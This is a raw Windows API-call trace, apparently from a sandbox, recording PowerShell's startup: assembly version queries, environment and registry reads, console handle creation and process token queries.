	[0934.068] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcda08, pwszLanguagesBuffer=0x2d1fbf8, pcchLanguagesBuffer=0xcda00 | out: pulNumLanguages=0xcda08, pwszLanguagesBuffer=0x2d1fbf8, pcchLanguagesBuffer=0xcda00) returned 1
	[0934.157] CoTaskMemAlloc (cb=0x24) returned 0x1f8c30
	[0934.157] GetUserDefaultLocaleName (in: lpLocaleName=0x1f8c30, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0934.157] CoTaskMemFree (pv=0x1f8c30) 
	[0935.041] CoTaskMemAlloc (cb=0x104) returned 0x15dfc0
	[0935.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15dfc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0935.041] CoTaskMemFree (pv=0x15dfc0) 
	[0935.043] CoTaskMemAlloc (cb=0x104) returned 0x15dfc0
	[0935.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15dfc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0935.043] CoTaskMemFree (pv=0x15dfc0) 
	[0935.045] CoTaskMemAlloc (cb=0x104) returned 0x15dfc0
	[0935.045] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15dfc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0935.045] CoTaskMemFree (pv=0x15dfc0) 
	[0935.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0935.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0935.054] SetErrorMode (uMode=0x1) returned 0x1
	[0935.055] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd680 | out: lpFileInformation=0xcd680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0935.055] SetErrorMode (uMode=0x1) returned 0x1
	[0935.055] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcd8f0 | out: lpdwHandle=0xcd8f0) returned 0x94c
	[0935.056] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d23488 | out: lpData=0x2d23488) returned 1
	[0935.057] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd868, puLen=0xcd860 | out: lplpBuffer=0xcd868*=0x2d23524, puLen=0xcd860) returned 1
	[0935.057] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x2d23600, puLen=0xcd7d0) returned 1
	[0935.057] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0935.057] CoTaskMemAlloc (cb=0x2e) returned 0x1f39e0
	[0935.057] lstrcpyW (in: lpString1=0x1f39e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0935.057] CoTaskMemFree (pv=0x1f39e0) 
	[0935.057] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x2d23654, puLen=0xcd7d0) returned 1
	[0935.057] lstrlenW (lpString="System.Management.Automation") returned 28
	[0935.057] CoTaskMemAlloc (cb=0x3c) returned 0x178f30
	[0935.057] lstrcpyW (in: lpString1=0x178f30, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0935.057] CoTaskMemFree (pv=0x178f30) 
	[0935.057] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x2d236b0, puLen=0xcd7d0) returned 1
	[0935.057] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0935.057] CoTaskMemAlloc (cb=0x20) returned 0x1f8c90
	[0935.057] lstrcpyW (in: lpString1=0x1f8c90, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0935.057] CoTaskMemFree (pv=0x1f8c90) 
	[0935.057] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x2d236f0, puLen=0xcd7d0) returned 1
	[0935.057] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0935.057] CoTaskMemAlloc (cb=0x44) returned 0x178f30
	[0935.058] lstrcpyW (in: lpString1=0x178f30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0935.058] CoTaskMemFree (pv=0x178f30) 
	[0935.058] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x2d23758, puLen=0xcd7d0) returned 1
	[0935.058] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0935.058] CoTaskMemAlloc (cb=0x76) returned 0x19ed20
	[0935.058] lstrcpyW (in: lpString1=0x19ed20, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0935.058] CoTaskMemFree (pv=0x19ed20) 
	[0935.058] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x2d237f4, puLen=0xcd7d0) returned 1
	[0935.058] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0935.058] CoTaskMemAlloc (cb=0x44) returned 0x178f30
	[0935.058] lstrcpyW (in: lpString1=0x178f30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0935.058] CoTaskMemFree (pv=0x178f30) 
	[0935.058] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x2d23858, puLen=0xcd7d0) returned 1
	[0935.058] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0935.058] CoTaskMemAlloc (cb=0x58) returned 0x1c0130
	[0935.058] lstrcpyW (in: lpString1=0x1c0130, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0935.058] CoTaskMemFree (pv=0x1c0130) 
	[0935.058] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x2d238d4, puLen=0xcd7d0) returned 1
	[0935.058] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0935.058] CoTaskMemAlloc (cb=0x20) returned 0x1f8c90
	[0935.058] lstrcpyW (in: lpString1=0x1f8c90, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0935.058] CoTaskMemFree (pv=0x1f8c90) 
	[0935.058] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x2d2357c, puLen=0xcd7d0) returned 1
	[0935.058] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0935.058] CoTaskMemAlloc (cb=0x66) returned 0x1f79e0
	[0935.058] lstrcpyW (in: lpString1=0x1f79e0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0935.058] CoTaskMemFree (pv=0x1f79e0) 
	[0935.058] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x0, puLen=0xcd7d0) returned 0
	[0935.058] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x0, puLen=0xcd7d0) returned 0
	[0935.058] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcd7d8, puLen=0xcd7d0 | out: lplpBuffer=0xcd7d8*=0x0, puLen=0xcd7d0) returned 0
	[0935.058] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd7a8, puLen=0xcd7a0 | out: lplpBuffer=0xcd7a8*=0x2d23524, puLen=0xcd7a0) returned 1
	[0935.058] CoTaskMemAlloc (cb=0x204) returned 0x1a1b90
	[0935.059] VerLanguageNameW (in: wLang=0x0, szLang=0x1a1b90, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0935.059] CoTaskMemFree (pv=0x1a1b90) 
	[0935.059] VerQueryValueW (in: pBlock=0x2d23488, lpSubBlock="\\", lplpBuffer=0xcd7f8, puLen=0xcd7f0 | out: lplpBuffer=0xcd7f8*=0x2d234b0, puLen=0xcd7f0) returned 1
	[0935.065] CoTaskMemAlloc (cb=0x104) returned 0x15dfc0
	[0935.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15dfc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0935.065] CoTaskMemFree (pv=0x15dfc0) 
	[0935.066] CoTaskMemAlloc (cb=0x104) returned 0x15dfc0
	[0935.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15dfc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0935.066] CoTaskMemFree (pv=0x15dfc0) 
	[0935.135] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd6c8 | out: phkResult=0xcd6c8*=0x2e4) returned 0x0
	[0935.135] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd6b8 | out: phkResult=0xcd6b8*=0x2e8) returned 0x0
	[0935.135] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd748 | out: phkResult=0xcd748*=0x2ec) returned 0x0
	[0935.137] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd68c, lpData=0x0, lpcbData=0xcd688*=0x0 | out: lpType=0xcd68c*=0x1, lpData=0x0, lpcbData=0xcd688*=0x56) returned 0x0
	[0935.138] CoTaskMemAlloc (cb=0x5a) returned 0x1f7970
	[0935.138] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd65c, lpData=0x1f7970, lpcbData=0xcd658*=0x56 | out: lpType=0xcd65c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd658*=0x56) returned 0x0
	[0935.138] CoTaskMemFree (pv=0x1f7970) 
	[0935.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0935.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0935.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0935.749] CoTaskMemAlloc (cb=0x104) returned 0x15dfc0
	[0935.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15dfc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0935.749] CoTaskMemFree (pv=0x15dfc0) 
	[0937.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0937.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0938.196] CoTaskMemAlloc (cb=0x104) returned 0x15e0d0
	[0938.196] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0938.196] CoTaskMemFree (pv=0x15e0d0) 
	[0938.197] CoTaskMemAlloc (cb=0x104) returned 0x15e0d0
	[0938.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0938.197] CoTaskMemFree (pv=0x15e0d0) 
	[0938.458] CoTaskMemAlloc (cb=0x104) returned 0x15e0d0
	[0938.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0938.458] CoTaskMemFree (pv=0x15e0d0) 
	[0938.459] CoTaskMemAlloc (cb=0x104) returned 0x15e0d0
	[0938.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0938.459] CoTaskMemFree (pv=0x15e0d0) 
	[0938.459] CoTaskMemAlloc (cb=0x104) returned 0x15e0d0
	[0938.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0938.459] CoTaskMemFree (pv=0x15e0d0) 
	[0939.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0939.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0939.057] CoTaskMemAlloc (cb=0x104) returned 0x15e0d0
	[0939.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0939.057] CoTaskMemFree (pv=0x15e0d0) 
	[0939.060] CoTaskMemAlloc (cb=0x104) returned 0x15e0d0
	[0939.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e0d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0939.060] CoTaskMemFree (pv=0x15e0d0) 
	[0939.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0939.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0940.359] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0940.359] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0940.359] CoTaskMemFree (pv=0x15e2f0) 
	[0940.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0940.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0940.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0940.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0940.375] SetErrorMode (uMode=0x1) returned 0x1
	[0940.375] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcd620 | out: lpFileInformation=0xcd620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0940.375] SetErrorMode (uMode=0x1) returned 0x1
	[0945.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0945.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0945.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0945.918] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0945.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0945.918] CoTaskMemFree (pv=0x15e2f0) 
	[0947.628] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0947.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.628] CoTaskMemFree (pv=0x15e2f0) 
	[0947.628] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0947.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.628] CoTaskMemFree (pv=0x15e2f0) 
	[0947.632] CoCreateGuid (in: pguid=0xcd9e8 | out: pguid=0xcd9e8*(Data1=0xd2866b1d, Data2=0xe919, Data3=0x45e7, Data4=([0]=0xb9, [1]=0x1a, [2]=0x1f, [3]=0x78, [4]=0x4a, [5]=0xc0, [6]=0xb0, [7]=0x93))) returned 0x0
	[0947.635] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0947.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.635] CoTaskMemFree (pv=0x15e2f0) 
	[0947.638] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0947.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.638] CoTaskMemFree (pv=0x15e2f0) 
	[0947.641] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0947.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.641] CoTaskMemFree (pv=0x15e2f0) 
	[0947.664] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0948.382] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcd690 | out: lpConsoleScreenBufferInfo=0xcd690) returned 1
	[0948.402] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0948.403] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcd690 | out: lpConsoleScreenBufferInfo=0xcd690) returned 1
	[0948.404] GetVersionExW (in: lpVersionInformation=0xcd620*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd620*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0948.407] GetCurrentProcess () returned 0xffffffffffffffff
	[0948.408] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcd6b8 | out: TokenHandle=0xcd6b8*=0x300) returned 1
	[0948.412] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd5d8 | out: TokenInformation=0x0, ReturnLength=0xcd5d8) returned 0
	[0948.413] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1af9a0
	[0948.413] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x8, TokenInformation=0x1af9a0, TokenInformationLength=0x4, ReturnLength=0xcd5d8 | out: TokenInformation=0x1af9a0, ReturnLength=0xcd5d8) returned 1
	[0948.414] DuplicateTokenEx (in: hExistingToken=0x300, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcd738 | out: phNewToken=0xcd738*=0x2fc) returned 1
	[0948.415] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd5d8 | out: TokenInformation=0x0, ReturnLength=0xcd5d8) returned 0
	[0948.415] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1af8c0
	[0948.415] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x8, TokenInformation=0x1af8c0, TokenInformationLength=0x4, ReturnLength=0xcd5d8 | out: TokenInformation=0x1af8c0, ReturnLength=0xcd5d8) returned 1
